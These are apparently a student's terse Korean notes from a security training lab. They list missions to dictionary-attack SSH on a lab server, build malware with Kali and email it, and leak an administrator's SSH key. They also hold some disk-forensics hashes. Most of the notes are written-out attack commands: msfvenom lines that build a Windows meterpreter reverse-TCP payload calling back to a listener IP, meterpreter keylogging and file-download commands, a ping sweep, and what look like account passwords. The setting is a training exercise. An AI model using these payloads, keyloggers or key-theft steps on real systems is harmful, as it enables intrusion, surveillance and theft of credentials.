사전공격하여 ssh 192.168.0.106 메인서버에 접속
암호는 공유서버에 저장되어 있음
master암호와 root암호는 동일함
22253
미션1
메인서버에 접속하여 본인의 이니셜 계정 생성후
이니셜 .st.kr이 동작하도록 설정할것
adduser khh
hosting 파일에 khh추가
미션2
CI4를 이용해 서버 점검 페이지를 만들어라
서버마다 각 계정 부여후 각자 만들것
일일 점검 내용은 chatgpt를 이용해 스크립트 작성후 웹화면으로
미션3
칼리 악성코드 작성후 master@st.kr로 메일 보내기
본인의 IP로 만들어 보내기
서버에는 packetbeat,filebeat가 아직 설치 전입니다.
순수하게 로그로만 접속기록을 찾아보세요
미션4
미션1,2,3 완료후 키인증 방식으로 변경
관리자가 생성한 키를 유출하여 접속하기
정상 0 sector
partition 1 : 2048
partition 2 : 7784448
MD5
1c8c6a9ad4125ec03fd36b82be65c4cc
SHA1
5f59a12ea39e98e27945d69c4df2e49c127fe15c
서과장
partition 1 : 63
partition 2 : 41945715
www.ntfs.com
원본 파티션1&2
00202100078E6AE40008000000C07600008E6BE40CD0C4CC00C8760000B07700
서과장유출
MD5
6ba97c1664555e334feaa7f4ecd56b1a
SHA1
4bd00acd2e52bbdd0d50fb59343831dcc76d3ace
msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.211 LPORT=1234 -b "\x00" -f exe -o /home/kali/ip211.exe
msfconsole -r malware.rc
ssh -i id_ed25519 master@192.168.56.102
키로거 작동
keyscan_start
keyscan_dump
keyscan_stop
파일 다운로드
download 파일명
auth.log에서 ssh만 검색
tail -f /var/log/auth.log | grep "sshd"
pid확인하기 위에서 ps aux 실행
ps aux | grep sshd
악성코드 작성
msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.7 LPORT=1234 -b "\x00" -f exe -o /home/kali/ip211.exe
powershell 비어있는 IP 스캔
for ($i=1; $1 -le 254; $i++) {ping -n 1 -w 1 192.168.0.$i | Select-String "응답" }
master
9999
root
5555
키로 해커가 접속을 해서 시스템 파괴